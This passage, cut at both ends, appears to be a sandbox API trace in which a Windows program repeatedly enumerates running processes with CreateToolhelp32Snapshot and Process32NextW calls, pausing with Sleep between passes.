cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.339] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.340] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.342] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.343] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.344] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0149.345] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.346] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.347] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.348] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.350] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.351] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.351] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.353] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.354] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.355] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0149.357] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.358] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.359] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.360] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.361] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0149.362] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0149.363] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0149.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0149.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0149.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0149.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0149.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0149.378] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0149.379] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0149.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0149.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0149.382] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0149.383] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0149.384] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0149.386] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0149.387] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0149.388] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0149.389] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0149.390] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0149.391] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.392] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0149.393] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0149.394] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0149.395] CloseHandle (hObject=0xbc) returned 1 [0149.395] Sleep (dwMilliseconds=0x12c) [0149.743] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0149.748] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.751] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0149.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.762] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.763] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0149.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.766] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.768] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0149.771] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0149.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0149.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0149.774] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0149.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0149.776] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 